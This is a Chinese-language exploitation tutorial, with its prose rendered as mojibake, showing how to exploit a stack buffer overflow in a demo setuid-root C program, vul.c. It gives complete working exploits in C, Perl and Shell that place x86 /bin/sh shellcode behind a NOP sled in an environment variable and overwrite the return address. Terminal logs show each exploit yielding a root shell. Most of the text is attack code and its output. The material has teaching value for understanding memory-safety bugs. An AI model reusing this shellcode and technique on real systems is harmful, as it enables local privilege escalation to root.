Òç³öÀûÓóÌÐò²»½ö½öÊÇÖ»ÄÜÓÃcÓïÑÔ±àд£¬Æäʵ¼¸ºõÈκαà³ÌÓïÑÔ¶¼ÄÜÓÃÀ´±àд
Òç³öÀûÓóÌÐò£¬ÕâÀïÓÃLinux×÷ΪÊÔÑéƽ̨£¬ÒÔʵÀýÑÝʾC¡¢Perl¡¢Shell¡¢Awk
ÓïÑÔ±àдÒç³öÀûÓóÌÐò¡£Ö®ËùÒÔÑ¡ÔñÕ⼸¸öÓïÑÔÊÇÒòΪËûÃǶ¼¼¸ºõÊÇUnixϵͳ
×Ô´øµÄÓïÑÔ£¨ÉÌÓÃUnixϵͳÖÐCÓïÑÔÀýÍ⣩¡£Ê¾ÀýÖлù±¾¶¼ÊÇ°ÑSHELLCODE·Åµ½
»·¾³±äÁ¿ÖÐÀ´ÊµÏÖ¾«È·¶¨Î»µÄ¡£
<Ò»> ÓÐÒç³ö©¶´µÄvul.c
[cloud@test]$Content$nbsp;id
uid=505(cloud) gid=503(test) groups=503(test)
[cloud@test]$Content$nbsp;cat vul.c
/* Demo
Have a bof vul at argv[1].
Write by watercloud @ xfocus.org
*/
#include<stdio.h>
int main(int argc,char * argv[])
{
char buff[32];
if(argc > 1)
{
strcpy(buff,argv[1]);
}
printf("buff : %s\n",buff);
return 0;
}
[cloud@test]$Content$nbsp;gcc vul.c -o vul
[cloud@test]$Content$nbsp;ls -l vul
-rwxr-xr-x 1 cloud test 11627 2ÔÂ 24 10:14 vul
[cloud@test]$Content$nbsp;sudo chown root vul
[cloud@test]$Content$nbsp;sudo chmod u+s vul
[cloud@test]$Content$nbsp;ls -lh vul
-rwsr-xr-x 1 root test 11K 2ÔÂ 24 10:14 vul
<¶þ> CÓïÑÔ°æ±¾ÀûÓóÌÐòex.c
[cloud@test]$Content$nbsp;cat ex.c
/* Demo for exploit bof of "./vul"
Write by watercloud @ xfocus.org
*/
#include <stdio.h>
#define TARGET "./vul"
#define ADDR 0xbffff3e8
char SH[]="1\xc0PPP[YZ4\xd0\xcd\x80"
"j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
int main(int argc,char * argv[])
{
char env_buff[4000];
char cmd_buff[1024];
int i,ret;
unsigned int *pi;
char * pc;
for(i=0;i<3096;env_buff[i++]=0x90){ };
env_buff[i]=¡¯\0¡¯;
strcat(env_buff,SH);
setenv("KK",env_buff,1);
strcpy(cmd_buff,TARGET);
pc=&cmd_buff[strlen(TARGET)];
*pc++=¡¯ ¡¯;
for(ret=1,i=0;i<4 && ret;i++)
{
int j;
*pc++=¡¯A¡¯;
pi=(unsigned int *)pc;
for(j=0;j<20;*pi++=ADDR,j++){};
*pi=0;
ret=system(cmd_buff);
}
return ret;
}
[cloud@test]$Content$nbsp;gcc ex.c -o ex
[cloud@test]$Content$nbsp;./ex
buff : Aèóÿ¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è??
èóÿ¿è??
buff : AAèóÿ¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?
¿è?¿è??
buff : AAAèóÿ¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?
ÿ¿è?¿è??
buff : AAAAèóÿ¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è
?¿è?¿è??
sh-2.05b# id
uid=0(root) gid=503(test) groups=503(test)
sh-2.05b# exit
exit
<Èý> perlÓïÑÔ°æ±¾ÀûÓóÌÐòex.pl
[cloud@test]$Content$nbsp;cat ex.pl
#!/usr/bin/perl
# Demo for exploit bof of "./vul"
# Write by watercloud @ xfocus.org
#$ENV_LEN=`env |wc -c`
$SHELL="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
$ENV{KK}= "\x90"x 3096 . $SHELL;
for($ret=1,$ag="AA",$i=0;$i<4 && $ret; $ag="A"x $i++) {
$ret=system "./vul",$ag. "\xff\xbf\xe8\xf3"x20; #ADDR:0xbffff3e8
}
#EOF
[cloud@test]$Content$nbsp;perl ex.pl
buff : AAÿ¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è
?¿è?¿è?
sh-2.05b# id
uid=0(root) gid=503(test) groups=503(test)
sh-2.05b# exit
exit
<ËÄ> ShellÓïÑÔ°æ±¾ÀûÓóÌÐòex.sh
[cloud@test]$Content$nbsp;cat ex.sh
#/bin/bash
# Demo for exploit bof of "./vul"
# Write by watercloud @ xfocus.org
#ENV_LEN=`env |wc -c|tr -d ¡¯ ¡¯`
SH="1\xc0PPP[YZ4\xd0\xcd\x80j\x0bX\x99Rhn/shh//biT[RSTY\xcd\x80";
AG="AA";for (( i=0;i<10;i++));do AG=$AG$AG;done ;AG=$AG$AG$AG #3096
for((i=0;i<20;i++));do AD=$AD"\xff\xbf\xe8\xf3";done #ADDR:0xbffff3e8
export AGSHELL=$AG`echo -e $SH`
for((i=0;i<4;i++)) ;do
AA=$AA"A"
if ./vul $AA`echo -e $AD`
then break
fi
done
#EOF
[cloud@test]$Content$nbsp;chmod a+x ex.sh
[cloud@test]$Content$nbsp;./ex.sh
buff : Aÿ¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?
ÿ¿è?¿è?
./ex.sh: line 16: 5287 ¶Î´íÎó ./vul $AA`echo -e $AD`
buff : AAÿ¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è?¿è
?¿è?¿è?
sh-2.05b# id
uid=0(root) gid=503(test) groups=503(test)
sh-2.05b# exit
exit
1 2 ÏÂÒ»Ò³ |
°²È«ÖйúÊ×Ò³ > ÎÄÕÂÖÐÐÄ > Òç³öÎÄÕÂ